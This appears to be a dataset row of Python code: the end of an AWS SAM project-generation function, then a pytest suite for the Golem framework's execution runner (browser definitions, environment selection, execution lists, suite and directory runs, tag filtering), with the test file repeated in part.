runtime: str, optional
Lambda Runtime (the default is "nodejs", which creates a nodejs project)
dependency_manager: str, optional
Dependency Manager for the Lambda Runtime Project(the default is "npm" for a "nodejs" Lambda runtime)
output_dir: str, optional
Output directory where project should be generated
(the default is ".", which implies current folder)
name: str, optional
Name of the project
(the default is "sam-sample-app", which implies a project named sam-sample-app will be created)
no_input : bool, optional
Whether to prompt for input or to accept default values
(the default is False, which prompts the user for values it doesn't know for baking)
Raises
------
GenerateProjectFailedError
If the process of baking a project fails
"""
template = None
for mapping in list(itertools.chain(*(RUNTIME_DEP_TEMPLATE_MAPPING.values()))):
if runtime in mapping["runtimes"] or any([r.startswith(runtime) for r in mapping["runtimes"]]):
if not dependency_manager or dependency_manager == mapping["dependency_manager"]:
template = mapping["init_location"]
break
if not template:
msg = "Lambda Runtime {} does not support dependency manager: {}".format(runtime, dependency_manager)
raise GenerateProjectFailedError(project=name, provider_error=msg)
params = {"template": location if location else template, "output_dir": output_dir, "no_input": no_input}
LOG.debug("Parameters dict created with input given")
LOG.debug("%s", params)
if not location and name is not None:
params["extra_context"] = {"project_name": name, "runtime": runtime}
params["no_input"] = True
LOG.debug("Parameters dict updated with project name as extra_context")
LOG.debug("%s", params)
try:
LOG.debug("Baking a new template with cookiecutter with all parameters")
cookiecutter(**params)
except CookiecutterException as e:
raise GenerateProjectFailedError(project=name, provider_error=e) | 0.580471 | 0.128143 |
import json
import os
from types import SimpleNamespace
import pytest
from golem.execution_runner import execution_runner as exc_runner
from golem.core import test
from golem.core import test_data
from golem.core import environment_manager
from golem.core import utils
from golem.core import settings_manager
from golem.core import file_manager
from golem.core import session
from golem.report import execution_report as exec_report
class TestDefineBrowsers:
remote_browsers = {
'chrome_60_mac': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
default_browsers = ['chrome', 'chrome-headless']
def test_define_browsers(self):
"""Verify that _define_browsers returns the correct values"""
browsers = ['chrome', 'chrome_60_mac']
expected = [
{
'name': 'chrome',
'full_name': None,
'remote': False,
'capabilities': {}
},
{
'name': 'chrome',
'full_name': 'chrome_60_mac',
'remote': True,
'capabilities': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
]
drivers_defined = exc_runner.define_browsers(browsers, self.remote_browsers,
self.default_browsers)
assert drivers_defined == expected
def test_define_browsers_drivers_empty(self):
"""Verify that _define_browsers returns correct value
when selected drivers is empty
"""
drivers = []
expected = []
drivers_defined = exc_runner.define_browsers(drivers, self.remote_browsers,
self.default_browsers)
assert drivers_defined == expected
def test_define_browsers_driver_is_not_defined(self):
"""Verify that _define_browsers raises the correct exception
when a driver name that is not defined is passed
"""
drivers = ['not_defined']
expected_msg = ['Error: the browser {} is not defined\n'.format('not_defined'),
'available options are:\n',
'\n'.join(self.default_browsers),
'\n'.join(list(self.remote_browsers.keys()))]
expected_msg = ''.join(expected_msg)
with pytest.raises(Exception) as excinfo:
_ = exc_runner.define_browsers(drivers, self.remote_browsers, self.default_browsers)
assert str(excinfo.value) == expected_msg
def test_define_browsers_browser_order_of_preference(self):
"""Verify that _define_browsers selects the drivers in the correct
order of precedence, first remote drivers then predefined drivers"""
remote_drivers = {
'chromex': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
default_drivers = ['chromex']
drivers = ['chromex']
drivers_defined = exc_runner.define_browsers(drivers, remote_drivers, default_drivers)
assert len(drivers_defined) == 1
assert drivers_defined[0]['remote'] is True
assert drivers_defined[0]['capabilities']['version'] == '60.0'
class TestSelectEnvironments:
@pytest.mark.slow
def test__select_environments(self, project_session):
"""Verify that _select_environments uses the correct order
of precedence"""
_, project = project_session.activate()
cli_envs = ['cli_env_1', 'cli_env_2']
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = cli_envs
execution_runner.suite.envs = ['suite_env_1', 'suite_env_2']
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == cli_envs
@pytest.mark.slow
def test__select_environments_cli_envs_empty(self, project_function):
"""Verify that _select_environments uses the correct order
of precedence when cli environments is empty"""
testdir, project = project_function.activate()
cli_envs = []
suite_envs = ['suite_env_1', 'suite_env_2']
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = cli_envs
execution_runner.suite.envs = suite_envs
path = os.path.join(testdir, 'environments.json')
with open(path, 'w+') as f:
f.write('{"env1": {}, "env2": {}}')
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == suite_envs
@pytest.mark.slow
def test__select_environments_cli_envs_empty_suite_envs_empty(self, project_function):
"""Verify that _select_environments uses the correct order
of precedence when cli environments and suite environments are empty"""
testdir, project = project_function.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = []
execution_runner.suite.envs = []
path = os.path.join(testdir, 'projects', project, 'environments.json')
with open(path, 'w+') as f:
f.write('{"env3": {}, "env4": {}}')
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == ['env3']
@pytest.mark.slow
def test__select_environments_all_envs_empty(self, project_function):
"""Verify that _select_environments uses the correct order
of precedence when cli environments, suite environments and
project environments are empty"""
_, project = project_function.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = []
execution_runner.cli_args.envs = []
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == []
class TestDefineExecutionList:
@pytest.mark.slow
def test_define_execution_list(self, project_function_clean):
"""Verify that the execution list is generated properly when there's only
one test without datasets, one driver and zero environments
"""
project_function_clean.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_001']
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project_function_clean.name
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_001', data_set={}, secrets={}, browser='chrome',
reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_data_sets(self, project_function_clean):
"""Verify that the execution list is generated properly when a test
has multiple data sets
"""
_, project = project_function_clean.activate()
test_name = 'test_002'
test.create_test(project, test_name)
tdata = [
{
'col1': 'a',
'col2': 'b'
},
{
'col1': 'c',
'col2': 'd',
}
]
test_data.save_external_test_data_file(project, test_name, tdata)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project_function_clean.name
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name=test_name, data_set={'col1': 'a', 'col2': 'b'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name=test_name, data_set={'col1': 'c', 'col2': 'd'}, secrets={},
browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_tests(self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple tests in the list
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_001'
test.create_test(project, test_name_one)
tdata = [
{
'col1': 'a',
'col2': 'b'
},
{
'col1': 'c',
'col2': 'd',
}
]
test_data.save_external_test_data_file(project, test_name_one, tdata)
# create test two
test_name_two = 'test_two_001'
test.create_test(project, test_name_two)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_001', data_set={'col1': 'a', 'col2': 'b'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_one_001', data_set={'col1': 'c', 'col2': 'd'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_two_001', data_set={}, secrets={},
browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_envs(self, project_function_clean):
"""Verify that the execution list is generated properly when the execution
has multiple envs
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_003'
test.create_test(project, test_name_one)
# create two environments in environments.json
env_data = {
"stage": {"url": "xxx"},
"preview": {"url": "yyy"}
}
env_data_json = json.dumps(env_data)
environment_manager.save_environments(project, env_data_json)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = ['stage', 'preview']
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'xxx', 'name': 'stage'}}, secrets={},
browser='chrome', reportdir=None, env='stage'),
SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'yyy', 'name': 'preview'}}, secrets={},
browser='chrome', reportdir=None, env='preview')
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_drivers(self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple drivers in the list
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_004'
test.create_test(project, test_name_one)
# create test two
test_name_two = 'test_two_004'
test.create_test(project, test_name_two)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome', 'firefox']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None),
SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_tests_datasets_drivers_envs(
self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple tests, data sets, drivers and environments
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_005'
test.create_test(project, test_name_one)
# test data for test one
tdata = [
{'col1': 'a' },
{'col1': 'b'}
]
test_data.save_external_test_data_file(project, test_name_one, tdata)
# create test two
test_name_two = 'test_two_005'
test.create_test(project, test_name_two)
# create two environments
env_data = {
"stage": {"url": "xxx"},
"preview": {"url": "yyy"}
}
env_data_json = json.dumps(env_data)
environment_manager.save_environments(project, env_data_json)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome', 'firefox']
execution_runner.execution.envs = ['stage', 'preview']
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='chrome', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_two_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_two_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_two_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'env': {'url': 'yyy','name': 'preview'}},
secrets={}, name='test_two_005', reportdir=None, env='preview')
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_with_secrets(self, project_function_clean):
"""Verify that the execution list is generated properly when there's only
one test without datasets, one driver and zero environments
"""
_, project = project_function_clean.activate()
secrets = {"a": "secret", "b": "secret02"}
secrets_path = os.path.join(project_function_clean.path, 'secrets.json')
with open(secrets_path, 'w') as secrets_file:
secrets_file.write(json.dumps(secrets, indent=True))
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_001']
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_001', data_set={}, secrets={"a": "secret", "b": "secret02"}, browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
class TestCreateExecutionDirectory:
@pytest.mark.slow
def test__create_execution_directory_is_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a suite is passed on
"""
_, project = project_class.activate()
timestamp = utils.get_timestamp()
suite_name = 'bar'
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_foo']
execution_runner.project = project
execution_runner.is_suite = True
execution_runner.suite_name = suite_name
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', suite_name, timestamp)
assert os.path.isdir(expected_path)
@pytest.mark.slow
def test__create_execution_directory_is_not_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a not suite is passed on
"""
_, project = project_class.activate()
test_name = 'foo'
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.test_name = test_name
execution_runner.project = project
execution_runner.is_suite = False
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', 'single_tests', test_name, timestamp)
assert os.path.isdir(expected_path)
class TestRunSingleTest:
@pytest.mark.slow
def test_run_single_test(self, project_class, test_utils):
testdir, project = project_class.activate()
test_name = 'foo001'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
test_utils.create_test(project, test_name)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_test(test_name)
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# test set dir + report.json
assert len(items) == 2
@pytest.mark.slow
def test_run_single_test_with_two_sets(self, project_class, test_utils, capsys):
"""Run a single test with two data sets.
It should display the number of tests and test sets found."""
testdir, project = project_class.activate()
test_name = 'foo002'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
content = ('data = [{"foo": 1}, {"foo": 2}]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_test(test_name)
out, err = capsys.readouterr()
# number of tests is displayed
assert 'Tests found: 1 (2 sets)' in out
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# two test set dirs + report.json
assert len(items) == 3
@pytest.mark.slow
def test_run_single_test_filter_by_tags(self, project_class, test_utils):
"""Run a single test with filtering by tags"""
testdir, project = project_class.activate()
test_name = 'foo003'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
content = ('tags = ["alfa", "bravo"]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
tags=['alfa'])
execution_runner.project = project
execution_runner.run_test(test_name)
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# test set dir + report.json
assert len(items) == 2
@pytest.mark.slow
def test_run_single_test_with_invalid_tags(self, project_class, test_utils, capsys):
testdir, project = project_class.activate()
test_name = 'foo004'
timestamp = utils.get_timestamp()
content = ('tags = ["alfa", "bravo"]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
tags=['charlie'])
execution_runner.project = project
execution_runner.run_test(test_name)
out, err = capsys.readouterr()
assert 'No tests found with tag(s): charlie' in out
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# only report.json is present
assert items == ['report.json']
class TestRunSuite:
@pytest.fixture(scope="class")
def _project_with_tags(self, project_class, test_utils):
"""A fixture of a project with tests that contain tags"""
_, project = project_class.activate()
tests = SimpleNamespace()
base_content = 'def test(data):\n pass\n'
tests.test_alfa_bravo = 'test_alfa_bravo'
content = 'tags = ["alfa", "bravo"]'
test_utils.create_test(project, tests.test_alfa_bravo, content=base_content+content)
tests.test_bravo_charlie = 'test_bravo_charlie'
content = 'tags = ["bravo", "charlie"]'
test_utils.create_test(project, tests.test_bravo_charlie, content=base_content+content)
tests.test_empty_tags = 'test_empty_tags'
content = 'tags = []'
test_utils.create_test(project, tests.test_empty_tags, content=base_content+content)
tests.test_no_tags = 'test_no_tags'
content = 'def test(data):\n pass'
test_utils.create_test(project, tests.test_no_tags, content=base_content+content)
project_class.tests = list(tests.__dict__)
project_class.t = tests
return project_class
@pytest.mark.slow
def test_run_suite(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 2' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_suite_without_tests(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
test_utils.create_suite(project, suite_name, tests=[])
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'No tests found for suite {}'.format(suite_name) in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
@pytest.mark.slow
def test_run_suite_filter_by_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['alfa', 'bravo'])
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 1' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 1
@pytest.mark.slow
def test_run_suite_filter_by_invalid_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['sierra', 'tango'])
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'No tests found with tag(s): sierra, tango' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
def test_run_suite_filter_by_invalid_tag_expression(self, _project_with_tags,
test_utils, capsys):
"""When a invalid tag expression is used a message is displayed
to the console, no tests are run, the report is generated,
and the execution exists with status code 1
"""
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['sierra = tango'])
execution_runner.project = project
with pytest.raises(SystemExit):
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
expected = ("InvalidTagExpression: unknown expression <class '_ast.Assign'>, the "
"only valid operators for tag expressions are: 'and', 'or' & 'not'")
# TODO: py 3.9
expected2 = ("InvalidTagExpression: unknown expression <class 'ast.Assign'>, the "
"only valid operators for tag expressions are: 'and', 'or' & 'not'")
assert expected in out or expected2 in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
class TestRunDirectory:
@pytest.fixture(scope="class")
def _project_with_tags(self, project_class, test_utils):
"""A fixture of a project with tests that contain tags"""
testdir, project = project_class.activate()
tests = SimpleNamespace()
base_content = 'def test(data):\n pass\n'
tests.test_alfa_bravo = 'test_alfa_bravo'
content = 'tags = ["alfa", "bravo"]'
test_name = '{}.{}'.format('foo', tests.test_alfa_bravo)
test_utils.create_test(project, test_name, content=base_content + content)
tests.test_bravo_charlie = 'test_bravo_charlie'
content = 'tags = ["bravo", "charlie"]'
test_name = '{}.{}'.format('foo', tests.test_bravo_charlie)
test_utils.create_test(project, test_name, content=base_content + content)
tests.test_empty_tags = 'test_empty_tags'
content = 'tags = []'
test_utils.create_test(project, tests.test_empty_tags, content=base_content + content)
tests.test_no_tags = 'test_no_tags'
content = 'def test(data):\n pass'
test_utils.create_test(project, tests.test_no_tags, content=base_content + content)
path_list = [testdir, 'projects', project, 'tests', 'empty']
file_manager.create_directory(path_list=path_list, add_init=True)
project_class.tests = list(tests.__dict__)
project_class.t = tests
return project_class
@pytest.mark.slow
def test_run_directory(self, _project_with_tags, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_directory('foo')
out, err = capsys.readouterr()
assert 'Tests found: 2' in out
data = exec_report.get_execution_data(project=project, suite='foo', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_directory_without_tests(self, _project_with_tags, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
dirname = 'empty'
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_directory(dirname)
out, err = capsys.readouterr()
expected = 'No tests were found in {}'.format(os.path.join('tests', dirname))
assert expected in out
data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
@pytest.mark.slow
def test_run_directory_filter_by_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
dirname = 'foo'
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['alfa', 'bravo'])
execution_runner.project = project
execution_runner.run_directory(dirname)
out, err = capsys.readouterr()
assert 'Tests found: 1' in out
data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 1
class TestRunWithEnvs:
@pytest.mark.slow
def test_run_with_environments(self, project_function, test_utils, capsys):
_, project = project_function.activate()
environments = json.dumps({'test': {}, 'stage': {}})
environment_manager.save_environments(project, environments)
test_utils.create_test(project, 'test01')
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
environments=['test', 'stage'])
execution_runner.project = project
execution_runner.run_directory('')
out, err = capsys.readouterr()
assert 'Tests found: 1 (2 sets)' in out
data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_with_not_existing_environments(self, project_function, test_utils, capsys):
"""Run tests with a not existing environment.
It should throw an error and finish with status code 1
"""
_, project = project_function.activate()
test_utils.create_test(project, 'test01')
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
environments=['not_existing'])
execution_runner.project = project
with pytest.raises(SystemExit) as wrapped_execution:
execution_runner.run_directory('')
assert wrapped_execution.value.code == 1
out, err = capsys.readouterr()
msg = ('ERROR: the following environments do not exist for project {}: '
'not_existing'.format(project))
assert msg in out
data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0 | tests/execution_runner/execution_runner_test.py | import json
import os
from types import SimpleNamespace
import pytest
from golem.execution_runner import execution_runner as exc_runner
from golem.core import test
from golem.core import test_data
from golem.core import environment_manager
from golem.core import utils
from golem.core import settings_manager
from golem.core import file_manager
from golem.core import session
from golem.report import execution_report as exec_report
class TestDefineBrowsers:
remote_browsers = {
'chrome_60_mac': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
default_browsers = ['chrome', 'chrome-headless']
def test_define_browsers(self):
"""Verify that _define_browsers returns the correct values"""
browsers = ['chrome', 'chrome_60_mac']
expected = [
{
'name': 'chrome',
'full_name': None,
'remote': False,
'capabilities': {}
},
{
'name': 'chrome',
'full_name': 'chrome_60_mac',
'remote': True,
'capabilities': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
]
drivers_defined = exc_runner.define_browsers(browsers, self.remote_browsers,
self.default_browsers)
assert drivers_defined == expected
def test_define_browsers_drivers_empty(self):
"""Verify that _define_browsers returns correct value
when selected drivers is empty
"""
drivers = []
expected = []
drivers_defined = exc_runner.define_browsers(drivers, self.remote_browsers,
self.default_browsers)
assert drivers_defined == expected
def test_define_browsers_driver_is_not_defined(self):
"""Verify that _define_browsers raises the correct exception
when a driver name that is not defined is passed
"""
drivers = ['not_defined']
expected_msg = ['Error: the browser {} is not defined\n'.format('not_defined'),
'available options are:\n',
'\n'.join(self.default_browsers),
'\n'.join(list(self.remote_browsers.keys()))]
expected_msg = ''.join(expected_msg)
with pytest.raises(Exception) as excinfo:
_ = exc_runner.define_browsers(drivers, self.remote_browsers, self.default_browsers)
assert str(excinfo.value) == expected_msg
def test_define_browsers_browser_order_of_preference(self):
"""Verify that _define_browsers selects the drivers in the correct
order of precedence, first remote drivers then predefined drivers"""
remote_drivers = {
'chromex': {
'browserName': 'chrome',
'version': '60.0',
'platform': 'macOS 10.12'
}
}
default_drivers = ['chromex']
drivers = ['chromex']
drivers_defined = exc_runner.define_browsers(drivers, remote_drivers, default_drivers)
assert len(drivers_defined) == 1
assert drivers_defined[0]['remote'] is True
assert drivers_defined[0]['capabilities']['version'] == '60.0'
class TestSelectEnvironments:
@pytest.mark.slow
def test__select_environments(self, project_session):
"""Verify that _select_environments uses the correct order
of precedence"""
_, project = project_session.activate()
cli_envs = ['cli_env_1', 'cli_env_2']
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = cli_envs
execution_runner.suite.envs = ['suite_env_1', 'suite_env_2']
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == cli_envs
@pytest.mark.slow
def test__select_environments_cli_envs_empty(self, project_function):
"""Verify that _select_environments uses the correct order
of precedence when cli environments is empty"""
testdir, project = project_function.activate()
cli_envs = []
suite_envs = ['suite_env_1', 'suite_env_2']
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = cli_envs
execution_runner.suite.envs = suite_envs
path = os.path.join(testdir, 'environments.json')
with open(path, 'w+') as f:
f.write('{"env1": {}, "env2": {}}')
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == suite_envs
@pytest.mark.slow
def test__select_environments_cli_envs_empty_suite_envs_empty(self, project_function):
"""Verify that _select_environments uses the correct order
of precedence when cli environments and suite environments are empty"""
testdir, project = project_function.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = []
execution_runner.suite.envs = []
path = os.path.join(testdir, 'projects', project, 'environments.json')
with open(path, 'w+') as f:
f.write('{"env3": {}, "env4": {}}')
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == ['env3']
@pytest.mark.slow
def test__select_environments_all_envs_empty(self, project_function):
